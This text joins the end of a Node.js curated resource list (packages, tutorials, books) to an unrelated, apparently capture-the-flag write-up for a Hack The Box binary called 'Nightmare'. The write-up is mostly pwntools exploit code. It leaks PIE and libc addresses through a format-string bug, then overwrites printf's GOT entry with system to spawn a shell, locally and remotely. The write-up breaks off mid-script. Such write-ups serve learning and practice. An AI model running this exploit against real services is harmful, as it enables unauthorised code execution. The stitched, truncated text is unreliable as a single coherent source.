virtual environment compatible to Python's virtualenv. - [nvm for Windows](https://github.com/coreybutler/nvm-windows) - Version management for Windows. - [nodenv](https://github.com/nodenv/nodenv) - Version manager that is similar to Ruby's rbenv. It supports auto version switching. - [fnm](https://github.com/Schniz/fnm) - Cross-platform Node.js version manager built in Rust. ### Natural language processing - [retext](https://github.com/retextjs/retext) - An extensible natural language system. - [franc](https://github.com/wooorm/franc) - Detect the language of text. - [leven](https://github.com/sindresorhus/leven) - Measure the difference between two strings using the Levenshtein distance algorithm. - [natural](https://github.com/NaturalNode/natural) - Natural language facility. - [nlp.js](https://github.com/axa-group/nlp.js) - Building bots, with entity extraction, sentiment analysis, automatic language identify, and more. ### Process management - [PM2](https://github.com/Unitech/pm2) - Advanced Process Manager. - [nodemon](https://github.com/remy/nodemon) - Monitor for changes in your app and automatically restart the server. - [node-mac](https://github.com/coreybutler/node-mac) - Run scripts as a native Mac daemon and log to the console app. - [node-linux](https://github.com/coreybutler/node-linux) - Run scripts as native system service and log to syslog. - [node-windows](https://github.com/coreybutler/node-windows) - Run scripts as a native Windows service and log to the Event viewer. - [supervisor](https://github.com/petruisfan/node-supervisor) - Restart scripts when they crash or restart when a `*.js` file changes. - [Phusion Passenger](https://github.com/phusion/passenger) - Friendly process manager that integrates directly into Nginx. ### Automation - [robotjs](https://github.com/octalmage/robotjs) - Desktop Automation: control the mouse, keyboard and read the screen. - [nut.js](https://github.com/nut-tree/nut.js) - Cross-platform native GUI automation / testing framework with image matching capabilities which integrates with Jest. ### AST - [Acorn](https://github.com/acornjs/acorn) - Tiny, fast JavaScript parser. - [babel-parser](https://github.com/babel/babel/tree/master/packages/babel-parser) - JavaScript parser used in Babel. ### Static site generators - [DocPad](https://github.com/docpad/docpad) - Static site generator with dynamic abilities and huge plugin ecosystem. - [docsify](https://github.com/docsifyjs/docsify) - Markdown documentation site generator with no statically built HTML files. - [Charge](https://github.com/brandonweiss/charge) - Opinionated, zero-config static site generator using JSX and MDX. ### Content management systems - [KeystoneJS](https://github.com/keystonejs/keystone) - CMS and web application platform built on Express and MongoDB. - [ApostropheCMS](https://github.com/apostrophecms/apostrophe) - Content management system with an emphasis on intuitive front end content editing and administration built on Express and MongoDB. - [Strapi](https://github.com/strapi/strapi) - Content Management Framework (headless-CMS) to build powerful APIs. - [Factor](https://github.com/FactorJS/factor) - Vue.js dashboard framework and headless CMS. - [AdminBro](https://github.com/SoftwareBrothers/adminjs) - Auto-generated admin panel with CRUD for all your resources. ### Forum - [nodeBB](https://github.com/NodeBB/NodeBB) - Forum platform for the modern web. ### Blogging - [Ghost](https://github.com/TryGhost/Ghost) - Simple, powerful publishing platform. - [Hexo](https://github.com/hexojs/hexo) - Fast, simple and powerful blogging framework. ### Weird - [cows](https://github.com/sindresorhus/cows) - ASCII cows. - [superb](https://github.com/sindresorhus/superb) - Get superb like words. - [cat-names](https://github.com/sindresorhus/cat-names) - Get popular cat names. - [dog-names](https://github.com/sindresorhus/dog-names) - Get popular dog names. - [superheroes](https://github.com/sindresorhus/superheroes) - Get superhero names. - [supervillains](https://github.com/sindresorhus/supervillains) - Get supervillain names. - [cool-ascii-faces](https://github.com/maxogden/cool-ascii-faces) - Get some cool ascii faces. - [cat-ascii-faces](https://github.com/melaniecebula/cat-ascii-faces) - `₍˄·͈༝·͈˄₎◞ ̑̑ෆ⃛ (=ↀωↀ=)✧ (^・o・^)ノ”`. - [nerds](https://github.com/SkyHacks/nerds) - Get data from nerdy topics like Harry Potter, Star Wars, and Pokémon. ### Serialization - [snappy](https://github.com/kesla/node-snappy) - Native bindings for Google's Snappy compression library. - [protobuf](https://github.com/protobufjs/protobuf.js) - Implementation of Protocol Buffers. - [compactr](https://github.com/compactr/compactr.js) - Implementation of the Compactr protocol. ### Miscellaneous - [execa](https://github.com/sindresorhus/execa) - Better `child_process`. - [cheerio](https://github.com/cheeriojs/cheerio) - Fast, flexible, and lean implementation of core jQuery designed specifically for the server. - [open](https://github.com/sindresorhus/open) - Opens stuff like websites, files, executables. - [hasha](https://github.com/sindresorhus/hasha) - Hashing made simple. Get the hash of a buffer/string/stream/file. - [dot-prop](https://github.com/sindresorhus/dot-prop) - Get a property from a nested object using a dot path. - [onetime](https://github.com/sindresorhus/onetime) - Only run a function once. - [mem](https://github.com/sindresorhus/mem) - Memoize functions - an optimization technique used to speed up consecutive function calls by caching the result of calls with identical input. - [strip-bom](https://github.com/sindresorhus/strip-bom) - Strip UTF-8 byte order mark (BOM) from a string/buffer/stream. - [os-locale](https://github.com/sindresorhus/os-locale) - Get the system locale. - [ssh2](https://github.com/mscdex/ssh2) - SSH2 client and server module. - [adit](https://github.com/markelog/adit) - SSH tunneling made simple. - [file-type](https://github.com/sindresorhus/file-type) - Detect the file type of a Buffer. - [Bottleneck](https://github.com/SGrondin/bottleneck) - Rate limiter that makes throttling easy. - [ow](https://github.com/sindresorhus/ow) - Function argument validation for humans. - [webworker-threads](https://github.com/audreyt/node-webworker-threads) - Lightweight Web Worker API implementation with native threads. - [clipboardy](https://github.com/sindresorhus/clipboardy) - Access the system clipboard (copy/paste). - [node-pre-gyp](https://github.com/mapbox/node-pre-gyp) - Makes it easy to publish and install Node.js C++ addons from binaries. - [opencv](https://github.com/peterbraden/node-opencv) - Bindings for OpenCV. The defacto computer vision library. - [dotenv](https://github.com/motdotla/dotenv) - Load environment variables from .env file. - [semver](https://github.com/npm/node-semver) - Semantic version parser. - [nodegit](https://github.com/nodegit/nodegit) - Native bindings to Git. - [json-strictify](https://github.com/pigulla/json-strictify) - Safely serialize a value to JSON without data loss or going into an infinite loop. - [jsdom](https://github.com/jsdom/jsdom) - JavaScript implementation of HTML and the DOM. - [@sindresorhus/is](https://github.com/sindresorhus/is) - Type check values. - [env-dot-prop](https://github.com/simonepri/env-dot-prop) - Get, set, or delete nested properties of process.env using a dot path. - [emittery](https://github.com/sindresorhus/emittery) - Simple and modern async event emitter. - [node-video-lib](https://github.com/gkozlenko/node-video-lib) - Pure JavaScript library for working with MP4 and FLV video files and creating MPEG-TS chunks for HLS streaming. - [basic-ftp](https://github.com/patrickjuchli/basic-ftp) – FTP/FTPS client. - [cashify](https://github.com/xxczaki/cashify) - Currency conversion. - [genepi](https://github.com/Geode-solutions/genepi) - Automatically generate a native Node.js addon from C++ code. - [husky](https://github.com/typicode/husky) - Create Git hook scripts. - [patch-package](https://github.com/ds300/patch-package) - Make and preserve fixes to npm dependencies. - [editly](https://github.com/mifi/editly) - Declarative video editing API. - [wild-wild-path](https://github.com/ehmicky/wild-wild-path) - Object property paths with wildcards and regexes. ## Package Manager - [npm](https://docs.npmjs.com/about-npm) - The default package manager. - [pnpm](https://pnpm.io) - Disk space efficient package manager. - [yarn](https://yarnpkg.com) - Alternative package manager. ## Resources ### Tutorials - [Node.js Best Practices](https://github.com/goldbergyoni/nodebestpractices) - Summary and curation of the top-ranked content on Node.js best practices, available in multiple languages. - [Nodeschool](https://github.com/nodeschool) - Learn Node.js with interactive lessons. - [The Art of Node](https://github.com/maxogden/art-of-node/#the-art-of-node) - An introduction to Node.js. - [module-best-practices](https://github.com/mattdesl/module-best-practices) - Some good practices when writing new npm modules. - [The Node Way](https://github.com/FredKSchott/the-node-way) - An entire philosophy of Node.js best practices and guiding principles exists for writing maintainable modules, scalable applications, and code that is actually pleasant to read. - [You Don't Know Node.js](https://github.com/azat-co/you-dont-know-node) - Introduction to Node.js core features and asynchronous JavaScript. - [Portable Node.js guide](https://github.com/ehmicky/cross-platform-node-guide) - Practical guide on how to write portable/cross-platform Node.js code. - [Build a real web app with no frameworks](https://frameworkless.js.org/course) - A set of video tutorials/livestreams to help you build and deploy a real, live web app using a handful of simple libraries and the core Node.js modules. ### Discovery - [npms](https://npms.io) - Superb package search with deep analysis of package quality using a [myriad of metrics](https://npms.io/about). - [npm addict](https://npmaddict.com) - Your daily injection of npm packages. - [npmcompare.com](https://npmcompare.com) - Compare and discover npm packages. ### Articles - [Error Handling in Node.js](https://sematext.com/blog/node-js-error-handling/) - [Teach Yourself Node.js in 10 Steps](https://ponyfoo.com/articles/teach-yourself-nodejs-in-10-steps) - [Mastering the filesystem in Node.js](https://medium.com/@yoshuawuyts/mastering-the-filesystem-in-node-js-4706b7cb0801) - [Semver: A Primer](https://nodesource.com/blog/semver-a-primer/) - [Semver: Tilde and Caret](https://nodesource.com/blog/semver-tilde-and-caret/) - [Why Asynchronous?](https://nodesource.com/blog/why-asynchronous/) - [Understanding the Node.js Event Loop](https://nodesource.com/blog/understanding-the-nodejs-event-loop/) - [Understanding Object Streams](https://nodesource.com/blog/understanding-object-streams/) - [Using Express to Quickly Build a GraphQL Server](https://snipcart.com/blog/graphql-nodejs-express-tutorial) ### Newsletters - [Node Weekly](https://nodeweekly.com) - Weekly e-mail round-up of Node.js news and articles. ### Videos - [Introduction to Node.js with Ryan Dahl](https://www.youtube.com/watch?v=jo_B4LTHi3I) - [Hands on with Node.js](https://learn.bevry.me/hands-on-with-node.js/preface) - [V8 Garbage Collector](https://v8.dev/blog/trash-talk) - Trash talk about the V8 garbage collector. - [10 Things I Regret About Node.js by Ryan Dahl](https://www.youtube.com/watch?v=M3BM9TB-8yA) - Insightful talk by the creator of Node.js about some of its limitions. - [Mastering REST APIs in Node.js: Zero-To-Hero](https://www.manning.com/livevideo/mastering-rest-apis-in-nodejs) - Video course on how to make REST APIs using Node.js. - [Make a vanilla Node.js REST API](https://www.youtube.com/watch?v=_1xa8Bsho6A) - Building a REST API without using a framework like Express. - [Google I/O 2009 - V8: High Performance JavaScript Engine](https://www.youtube.com/watch?v=FrufJFBSoQY) - The basics of V8 architecture and how it optimizes JavaScript execution. - [Google I/O 2012 - Breaking the JavaScript Speed Limit with V8](https://www.youtube.com/watch?v=UJPdhx5zTaw) - How V8 optimizes JavaScript execution. - [Google I/O 2013 - Accelerating Oz with V8: Follow the Yellow Brick Road to JavaScript Performance](https://www.youtube.com/watch?v=VhpdsjBUS3g) - How to detect app bottlenecks and optimize performance with V8 knowledge. - [Node.js Internal Architecture | Ignition, Turbofan, Libuv](https://www.youtube.com/watch?v=OCjvhCFFPTw) - How Node.js works internally, with a focus on V8 and libuv. - [Introduction to libuv: What's a Unicorn Velociraptor?](https://www.youtube.com/watch?v=_c51fcXRLGw) - `libuv` architecture, thread pool, and event loop, with its source code. - [libuv Cross platform asynchronous i/o](https://www.youtube.com/watch?v=kCJ3PFU8Ke8) - `libuv` architecture in detail, such as where it's actually using threads. - [You Don't Know Node - ForwardJS San Francisco](https://www.youtube.com/watch?v=oPo4EQmkjvY) - Explaining Node.js internals with quizzes about V8, libuv, event loop, module, stream, and cluster. ### Books - [Node.js in Action](https://www.manning.com/books/node-js-in-action-second-edition) - [Node.js in Practice](https://www.amazon.com/Node-js-Practice-Alex-R-Young/dp/1617290939) - [Mastering Node](https://visionmedia.github.io/masteringnode/) - [Node.js 8 the Right Way](https://pragprog.com/book/jwnode2/node-js-8-the-right-way/) - [Professional Node.js: Building JavaScript Based Scalable Software](https://www.amazon.com/Professional-Node-js-Building-Javascript-Scalable-ebook/dp/B009L7QETY/) - [Secure Your Node.js Web Application](https://www.amazon.com/Secure-Your-Node-js-Web-Application/dp/1680500856) - [Express in Action](https://www.manning.com/books/express-in-action) - [Practical Modern JavaScript](https://www.amazon.com/Practical-Modern-JavaScript-Dive-Future/dp/149194353X) - [Mastering Modular JavaScript](https://www.amazon.com/Mastering-Modular-JavaScript-Nicolas-Bevacqua/dp/1491955686/) - [Get Programming with Node.js](https://www.manning.com/books/get-programming-with-node-js) - [Node.js Cookbook](https://www.amazon.com/dp/1838558756) - [Node.js Design Patterns](https://www.nodejsdesignpatterns.com) ### Blogs - [Node.js blog](https://nodejs.org/en/blog/) - [webapplog.com](https://webapplog.com/tag/node-js/) - Blog posts on Node.js and JavaScript from the author of Practical Node.js and Pro Express.js Azat Mardan. ### Courses - [Learn to build apps and APIs with Node.js](https://learnnode.com/friend/AWESOME) - Video course by Wes Bos. - [Real Time Web with Node.js](https://www.pluralsight.com/courses/code-school-real-time-web-with-nodejs) - [Learn and Understand Node.js](https://www.udemy.com/course/understand-nodejs/) - [Node.js Full Stack Developer Course](https://kinsta.com/academy/course/node-js-full-stack-developer/) ### Cheatsheets - [Express.js](https://github.com/azat-co/cheatsheets/tree/master/express4) - [Stream FAQs](https://github.com/stephenplusplus/stream-faqs) - Answering common questions about streams, covering pagination, events, and more. - [Strong Node.js](https://github.com/jesusprubio/strong-node) - Checklist for source code security analysis of a Node.js web service. ### Tools - [OctoLinker](https://chrome.google.com/webstore/detail/octolinker/jlmafbaeoofdegohdhinkhilhclaklkp) - Chrome extension that linkifies dependencies in package.json, .js, .jsx, .coffee and .md files on GitHub. - [npm-hub](https://chrome.google.com/webstore/detail/npmhub/kbbbjimdjbjclaebffknlabpogocablj) - Chrome extension to display npm dependencies at the bottom of a repo's readme. - [RunKit](https://runkit.com) - Embed a Node.js environment on any website. - [github-npm-stats](https://chrome.google.com/webstore/detail/github-npm-stats/oomfflokggoffaiagenekchfnpighcef) - Chrome extension that displays npm download stats on GitHub. - [npm semver calculator](https://semver.npmjs.com) - Visually explore what versions of a package a semver range matches. - [CodeSandbox](https://codesandbox.io/s/node-http-server-node) - Online IDE and prototyping. - [Amplication](https://github.com/amplication/amplication) - Auto-generates fully functional apps. - [RunJS](https://runjs.app) - Desktop JavaScript playground. ### Community - [Stack Overflow](https://stackoverflow.com/questions/tagged/node.js) - [Reddit](https://www.reddit.com/r/node) - [Twitter](https://twitter.com/nodejs) - [Hashnode](https://hashnode.com/n/nodejs) - [Discord](https://discord.com/invite/96WGtJt) ### Miscellaneous - [nodebots](https://nodebots.io) - Robots powered by JavaScript. - [node-module-boilerplate](https://github.com/sindresorhus/node-module-boilerplate) - Boilerplate to kickstart creating a node module. - [modern-node](https://github.com/sheerun/modern-node) - Toolkit for creating node modules with Jest, Prettier, ESLint, and Standard. - [generator-nm](https://github.com/sindresorhus/generator-nm) - Scaffold out a node module. - [Microsoft Node.js Guidelines](https://github.com/Microsoft/nodejs-guidelines) - Tips, tricks, and resources for working with Node.js on Microsoft platforms. - [Module Requests & Ideas](https://github.com/sindresorhus/project-ideas) - Request a JavaScript module you wish existed or get ideas for modules. - [v8-perf](https://github.com/thlorenz/v8-perf) - Notes and resources related to V8 and thus Node.js performance. ## Related lists - [awesome-npm](https://github.com/sindresorhus/awesome-npm) - Resources and tips for using npm. - [awesome-cross-platform-nodejs](https://github.com/bcoe/awesome-cross-platform-nodejs) - Resources for writing and testing cross-platform code.
# Nightmare > Write-up author: jon-brandy ## DESCRIPTION: You seem to be stuck in an endless nightmare. Can you find a way out? ## HINT: - NONE ## STEPS: 1. In this challenge we're given a 64 bit binary , stripped, and with **NO RELRO**. ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/05cea160-e903-4d4d-a710-7caac4a7acad) ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/4ba73284-daca-4972-98d7-029cc3d7751c) 2. The exploit here is we need to leak the leak and calculate the piebase and libc_base then. 3. After decompiled the binary using ghidra, i noticed there's a format string vulnerability for first option menu and second option menu. > This function called when user choose the 1st option menu. #### NOTES: The format string vuln found at line 12, the binary seems not specify the output format. ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/8e3b5d39-54d2-4899-b8d8-1628b7c5e2ec) > This function called when user choose the 2nd option menu. #### NOTES: The format strings vuln found at line 19. ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/4034274f-e571-4ff5-b207-26f3010dbd35) 4. Well seems like the intended approach to leak the piebase and libc_base are from the format strings, because there are no potential bufferoverflow. 5. I chose to use the first option, this is the script i used to leak the piebase and libc_base. > Fuzzy script ```py from pwn import * import os os.system('clear') def start(argv=[], *a, **kw): if args.REMOTE: return remote(sys.argv[1], sys.argv[2], *a, **kw) elif args.GDB: return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe] + argv, *a, **kw) gdbscript =''' init-pwndbg piebase breakrva 0x138c continue '''.format(**locals()) exe = './nightmare' elf = context.binary = ELF(exe, checksec=True) context.log_level = 'INFO' sh = start() for i in range(100): try: #sh = process() sh.sendlineafter(b'>', b'1') sh.recvuntil(b'>') print("Iter {}:".format(i)) sh.sendline('%{}$p'.format(i)) sh.recvuntil(b'> ') get = sh.recvlineS() print(get) #sh.close() except EOFError: pass sh.interactive() ``` 6. Don't forget to set the GDB script for breakpoint at the `fprintf` so we can use the value leaked for calculating and comparing the piebase and libcbase. 7. But before use the GDB script, let's run with the normal mode. > At iter 23 and 26 could be the correct one. ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/d498e189-d9d3-4904-8a77-eb5e43ab4071) 8. To be honest, to find the correct PIE and libc address, usually i just calculate every address i found until it's the same as the libc_base at the binary (i bruteforced it). 9. Let's calculate the piebase first, now run the script using GDBscript. > Keep continue, until you hit the 23th iter. ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/c1a93a39-7aa5-40fa-8086-75c9f8458982) > Checking the piebase ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/0055561f-c156-4752-a8b1-e69b00b3be39) > Calculating piebase ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/e2969d0d-7484-4aa5-97be-aa86046c2ebc) 10. This means we need to minus the leaked pie with `13792`. > SCRIPT ```py from pwn import * import os os.system('clear') def start(argv=[], *a, **kw): if args.REMOTE: return remote(sys.argv[1], sys.argv[2], *a, **kw) elif args.GDB: return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe] + argv, *a, **kw) gdbscript =''' init-pwndbg piebase breakrva 0x138c continue '''.format(**locals()) exe = './nightmare' elf = context.binary = ELF(exe, checksec=True) context.log_level = 'INFO' sh = start() ''' for i in range(100): try: #sh = process() sh.sendlineafter(b'>', b'1') sh.recvuntil(b'>') print("Iter {}:".format(i)) sh.sendline('%{}$p'.format(i)) sh.recvuntil(b'> ') get = sh.recvlineS() print(get) #sh.close() except EOFError: pass ''' sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', '%23$p') sh.recvuntil(b'>') get_leak_pie = sh.recvlineS() leak = int(get_leak_pie, 16) log.success('Leaked pie --> %#0x', leak) pie_base = leak - 13792 log.info('This is the actual pie_base --> %#0x', pie_base) sh.interactive() ``` > RESULT - GOT THE SAME RESULT - Means we grab the correct one. ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/d79abe08-d25d-4173-a356-569d623f40c2) 11. Now calculate the libc_base. > Grab at iter 26 (our previously potential libc address) and get the distance to the libc_system_base. ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/3b3d3765-449a-42fa-af5d-7f81e7ebcfbc) > Calculate with python script ```py from pwn import * import os os.system('clear') def start(argv=[], *a, **kw): if args.REMOTE: return remote(sys.argv[1], sys.argv[2], *a, **kw) elif args.GDB: return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe] + argv, *a, **kw) gdbscript =''' init-pwndbg piebase breakrva 0x138c continue '''.format(**locals()) exe = './nightmare' elf = context.binary = ELF(exe, checksec=True) context.log_level = 'INFO' sh = start() ''' for i in range(100): try: #sh = process() sh.sendlineafter(b'>', b'1') sh.recvuntil(b'>') print("Iter {}:".format(i)) sh.sendline('%{}$p'.format(i)) sh.recvuntil(b'> ') get = sh.recvlineS() print(get) #sh.close() except EOFError: pass ''' sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', '%23$p') sh.recvuntil(b'>') get_leak_pie = sh.recvlineS() leak = int(get_leak_pie, 16) log.success('Leaked pie --> %#0x', leak) pie_base = leak - 13792 log.info('This is the actual pie_base --> %#0x', pie_base) sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', '%26$p') sh.recvuntil(b'>') get_leak_libc_system = sh.recvlineS() leaked_libc_system = int(get_leak_libc_system, 16) log.success('Leaked libc system address --> %#0x', leaked_libc_system) libc_system_binary = leaked_libc_system - 1599312 log.info('This is the calculated_libc_system --> %#0x', libc_system_binary) sh.interactive() ``` > It's correct ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/7c1414bd-03a1-4ec3-9df5-805184317d42) > Calculate the libc_base ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/4596ca09-9ea8-4d62-9feb-18b51a3dddd7) ```py libc_base = libc_system_binary - 0x4c330 log.info('This is the libc_base --> %#0x', libc_base) ``` 12. Great! Since we have the libc_base now we can calculate the binsh address, simply using this formula: ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/deb346f4-3ad5-458e-a09f-2e58473c5c6f) > Formula ```py binsh = libc_base + 0x196031 log.info('This is the binsh strings address --> %#0x', binsh) ``` > FULL SCRIPT (so far..) ```py from pwn import * import os os.system('clear') def start(argv=[], *a, **kw): if args.REMOTE: return remote(sys.argv[1], sys.argv[2], *a, **kw) elif args.GDB: return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe] + argv, *a, **kw) gdbscript =''' init-pwndbg piebase breakrva 0x138c continue '''.format(**locals()) exe = './nightmare' elf = context.binary = ELF(exe, checksec=True) context.log_level = 'INFO' sh = start() ''' for i in range(100): try: #sh = process() sh.sendlineafter(b'>', b'1') sh.recvuntil(b'>') print("Iter {}:".format(i)) sh.sendline('%{}$p'.format(i)) sh.recvuntil(b'> ') get = sh.recvlineS() print(get) #sh.close() except EOFError: pass ''' sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', '%23$p') sh.recvuntil(b'>') get_leak_pie = sh.recvlineS() leak = int(get_leak_pie, 16) log.success('Leaked pie --> %#0x', leak) pie_base = leak - 13792 log.info('This is the actual pie_base --> %#0x', pie_base) sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', '%26$p') sh.recvuntil(b'>') get_leak_libc_system = sh.recvlineS() leaked_libc_system = int(get_leak_libc_system, 16) log.success('Leaked libc system address --> %#0x', leaked_libc_system) libc_system_binary = leaked_libc_system - 1599312 log.info('This is the calculated_libc_system --> %#0x', libc_system_binary) libc_base = libc_system_binary - 0x4c330 log.info('This is the libc_base --> %#0x', libc_base) binsh = libc_base + 0x196031 log.info('This is the binsh strings address --> %#0x', binsh) sh.interactive() ``` > Checking if correct (using GDB) ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/6e94782a-6b28-4dea-afcc-5e0e1bebdf35) 13. Finally the last exploit we should do is to overwrite the Global Offset Table (GOT), why need to overwrite? Because there's no BOF but no RELRO. Means we can spawn a shell by overwrite the GOT. 14. We need to overwrite a function of the GOT with **system**. 15. Based from the decompiled binary, it seems the potential overwrite only for the `printf()`. > At line 19 we can send a strings "/bin/sh" then change the printf() to system() to get the shell. ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/c165faf8-22f7-4e93-b72e-e24d2668bc16) 16. But the problem is, we might get an error when system() is called at another LOC remembering there are many printf() called. 17. Anyway let's just try it. 18. First calculate the printf@got address. > FORMULA ```py printf_got_addr = pie_base + elf.got['printf'] log.info('This is the printf@got addr --> %#0x', printf_got_addr) ``` > Check it using GDB ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/21a71e35-6789-4a06-8c5a-e3e0890c0676) 19. Nice, now we want to get the offset (that it needs to write data, then we can just pass arg) to overwriting the function name, in order to get that easily we can use `FmtStr` from pwntools. 20. But we need to change a little for our approach to leak the piebase and libc_base. > Modified Script ```py from pwn import * import os os.system('clear') def start(argv=[], *a, **kw): if args.REMOTE: return remote(sys.argv[1], sys.argv[2], *a, **kw) elif args.GDB: return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe] + argv, *a, **kw) gdbscript =''' init-pwndbg piebase breakrva 0x138c continue '''.format(**locals()) exe = './nightmare' elf = context.binary = ELF(exe, checksec=True) context.log_level = 'INFO' sh = start() ''' for i in range(100): try: #sh = process() sh.sendlineafter(b'>', b'1') sh.recvuntil(b'>') print("Iter {}:".format(i)) sh.sendline('%{}$p'.format(i)) sh.recvuntil(b'> ') get = sh.recvlineS() print(get) #sh.close() except EOFError: pass ''' ## 1st method to leak the pie_base and libc_system_address ''' sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', '%23$p') sh.recvuntil(b'>') get_leak_pie = sh.recvlineS() leak = int(get_leak_pie, 16) log.success('Leaked pie --> %#0x', leak) pie_base = leak - 13792 log.info('This is the actual pie_base --> %#0x', pie_base) sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', '%26$p') sh.recvuntil(b'>') get_leak_libc_system = sh.recvlineS() leaked_libc_system = int(get_leak_libc_system, 16) log.success('Leaked libc system address --> %#0x', leaked_libc_system) ''' ## 2nd method use (since we want to get the offset automatically) ## REFERENCE --> https://docs.pwntools.com/en/stable/fmtstr.html def send_payload(payload): # can determine the correct offset and send our payload auto. sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', payload) sh.recvuntil(b'> ') return sh.recvline().strip() # cannot using recvlineS() dunno why.. format_str = FmtStr(execute_fmt=send_payload) leak = int(send_payload('%23$p'), 16) log.success('Leaked pie --> %#0x', leak) pie_base = leak - 13792 log.info('This is the actual pie_base --> %#0x', pie_base) leaked_libc_system = int(send_payload('%26$p'), 16) log.success('Leaked libc system address --> %#0x', leaked_libc_system) libc_system_binary = leaked_libc_system - 1599312 log.info('This is the calculated_libc_system --> %#0x', libc_system_binary) libc_base = libc_system_binary - 0x4c330 log.info('This is the libc_base --> %#0x', libc_base) binsh = libc_base + 0x196031 log.info('This is the binsh strings address --> %#0x', binsh) ## REMEMBERING PIE ENABLED, actually need to elf.address = pie_base (for best practice) printf_got_addr = pie_base + elf.got['printf'] log.info('This is the printf@got addr --> %#0x', printf_got_addr) ``` > RESULT ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/ca5dc7c5-bcec-4707-bb6a-07a84eb718b5) 21. Lastly we just need to overwrite the function name to libc_system_address and executes it using these LOC: ```py format_str = FmtStr(execute_fmt=send_payload) format_str.write(printf_got_addr, libc_system_binary) format_str.execute_writes() # perform the writes ``` 22. Then let's open option 2 then run the shell by sending `sh`. > FULL SCRIPT ```py from pwn import * import os os.system('clear') def start(argv=[], *a, **kw): if args.REMOTE: return remote(sys.argv[1], sys.argv[2], *a, **kw) elif args.GDB: return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe] + argv, *a, **kw) gdbscript =''' init-pwndbg piebase breakrva 0x138c continue '''.format(**locals()) exe = './nightmare' elf = context.binary = ELF(exe, checksec=True) context.log_level = 'INFO' sh = start() ''' for i in range(100): try: #sh = process() sh.sendlineafter(b'>', b'1') sh.recvuntil(b'>') print("Iter {}:".format(i)) sh.sendline('%{}$p'.format(i)) sh.recvuntil(b'> ') get = sh.recvlineS() print(get) #sh.close() except EOFError: pass ''' ## 1st method to leak the pie_base and libc_system_address ''' sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', '%23$p') sh.recvuntil(b'>') get_leak_pie = sh.recvlineS() leak = int(get_leak_pie, 16) log.success('Leaked pie --> %#0x', leak) pie_base = leak - 13792 log.info('This is the actual pie_base --> %#0x', pie_base) sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', '%26$p') sh.recvuntil(b'>') get_leak_libc_system = sh.recvlineS() leaked_libc_system = int(get_leak_libc_system, 16) log.success('Leaked libc system address --> %#0x', leaked_libc_system) ''' ## 2nd method use (since we want to get the offset automatically) ## REFERENCE --> https://docs.pwntools.com/en/stable/fmtstr.html # option local def send_payload(payload): # can determine the correct offset and send our payload auto. sh.sendlineafter(b'>', b'1') sh.sendlineafter(b'>', payload) sh.recvuntil(b'> ') return sh.recvline().strip() # cannot using recvlineS() dunno why.. format_str = FmtStr(execute_fmt=send_payload) leak = int(send_payload('%23$p'), 16) log.success('Leaked pie --> %#0x', leak) pie_base = leak - 13792 log.info('This is the actual pie_base --> %#0x', pie_base) leaked_libc_system = int(send_payload('%26$p'), 16) log.success('Leaked libc system address --> %#0x', leaked_libc_system) libc_system_binary = leaked_libc_system - 1599312 log.info('This is the calculated_libc_system --> %#0x', libc_system_binary) libc_base = libc_system_binary - 0x4c330 log.info('This is the libc_base --> %#0x', libc_base) binsh = libc_base + 0x196031 log.info('This is the binsh strings address --> %#0x', binsh) ## REMEMBERING PIE ENABLED, actually need to elf.address = pie_base (for best practice) printf_got_addr = pie_base + elf.got['printf'] log.info('This is the printf@got addr --> %#0x', printf_got_addr) ## OVERWRITING "printf" with "system" using FmtStr format_str = FmtStr(execute_fmt=send_payload) format_str.write(printf_got_addr, libc_system_binary) format_str.execute_writes() # perform the writes sh.sendline(b'2') # go to second menu sh.sendline(b'sh') # run shell # can't /bin/sh\x00 sh.interactive() ``` > RESULT LOCALLY ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/e3d3c239-16dc-4f27-b831-c9f2bcc80ecf) 23. Successfully get the shell locally. 24. Let's try send it remotely. > REMOTELY ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/9a7ce607-41f5-4300-9edf-ecb5e7cf5079) 25. Confused why got out of range. 26. Took me very long to realize that when i ran the same method to leak the PIE or libc by sending --> %26$p manually, it does not reflect any. > Manually in remote server ![image](https://github.com/Bread-Yolk/hackthebox/assets/70703371/97211c8d-7905-42c3-ad4b-014f79c0d60e) 27. Well this is the mistake, hence the intended solution must be by leaking the address using option 2. 28. Anyway to skip this long walkthrough, just want to tell the approach is the same, the differences just only by the option chosen to leak the address and the libc library used at the remote server. #### NOTES: I gave comment for every critical changes. > FINAL SCRIPT ```py from pwn import * import os os.system('clear') def start(argv=[], *a, **kw): if args.REMOTE: return remote(sys.argv[1], sys.argv[2], *a, **kw) elif args.GDB: return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe] + 